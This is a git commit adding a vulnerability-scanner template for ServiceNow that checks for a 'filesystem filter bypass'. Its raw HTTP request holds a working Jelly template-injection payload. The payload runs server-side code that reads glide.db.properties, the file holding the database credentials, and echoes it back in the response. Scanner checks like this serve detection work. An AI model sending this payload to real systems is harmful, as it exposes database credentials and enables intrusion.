Create servicenow-filesystem-bypass.yaml
parent
064ae930b1
commit
dfdc32e3a1
|
@ -0,0 +1,19 @@
|
|||
id: servicenow-filesystem-bypass
|
||||
|
||||
info:
|
||||
name: Service Now - Filesystem Filter Bypass
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'db.user'
|
Loading…
Reference in New Issue